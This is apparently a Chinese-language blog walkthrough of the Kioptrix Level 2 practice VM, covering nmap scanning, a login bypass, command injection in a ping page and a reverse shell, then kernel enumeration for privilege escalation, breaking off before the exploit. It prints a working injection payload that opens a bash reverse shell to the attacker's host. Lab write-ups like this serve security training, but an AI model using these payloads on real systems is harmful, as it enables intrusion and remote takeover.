类OCSP靶场-Kioptrix系列-Kioptrix Level 2

一、前情提要

二、实战打靶

1. 信息收集

1.1. 主机发现

1.2. 端口扫描

1.3.目录遍历

2.漏洞发现

2.1. 登录框测试

2.2. 发现命令执行

2.3 构造命令执行利用payload

3.提权

3.1. 搜索提权exp

3.2. 查看exp信息

3.3. Privilege Escalation的exp利用

exp_9542

一、前情提要

kali黑客-利用searchsploit搜索exp一键化攻击-CSDN博客

一篇文章带你理解nmap的使用-nmap使用手册-CSDN博客

类OCSP靶场-Kioptrix系列-Kioptrix Level 1-CSDN博客

二、实战打靶

这个靶机练习，相当于内网渗透。

1. 信息收集

1.1. 主机发现

在同一局域网下的主机发现思路：

通过ifconfig或ip add的方式查看当前主机的网段
利用nmap对扫描对应子网内的所有主机在线情况

执行完命令可以发现，该网段除了我们的kali还有一台130的主机在线。

(PS:在虚拟网络下1和2这两个ip分别对应的是网卡和网关。)

1.2. 端口扫描

还是利用nmap进行端口扫描并探测端口服务的版本。

命令：nmap -sT -sV - -O --min-rate 10000 -p- 192.168.150.130
- -sT：以TCP三次握手的形式进行扫描
- -sV：扫描各服务的版本
- -O：扫描目标机器的操作系统
- --min-rate：最少的发包数量
- -p-：全端口扫描

1.3.目录遍历

2.漏洞发现

在目录爆破阶段查看的时候，发现主页是个登录框

2.1. 登录框测试

对账号密码进行爆破，存在不同字节的数据包，看payload是万能密码，成功登录

2.2. 发现命令执行

功能似乎是ping命令，但是没有输入功能点，查看源代码看看传参如何传递

发现存在输入框，但是html错误，主动编辑前端代码加上去

2.3 构造命令执行利用payload

执行没有问题

构造一个反弹shell，作用是把shell弹到kali。

本地监听：nc -lvvp 8888
命令：127 | bash -i >& /dev/tcp/192.168.150.183/8888 0>&1
原理
- bash -i >& /dev/tcp/192.168.150.183/8888 0>&1是反弹shell命令
- 前面使用127 |，管道符就是或的意思，目前就是使得前面的命令失效，让靶机执行反弹shell命令

3.提权

进去发现我们是一共低权限用户，先进行一波简单的信息收集，收集本地版本信息、操作系统信息，看是否有提权的exp

lsb_release -a（系统版本）
uname -a（内核版本）
hostnamectl（系统版本）
这种查看命令有很多

LSB Version:    :core-3.0-ia32:core-3.0-noarch:graphics-3.0-ia32:graphics-3.0-noarch
Distributor ID: CentOS
Description:    CentOS release 4.5 (Final)
Release:        4.5
Codename:       Final


Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linu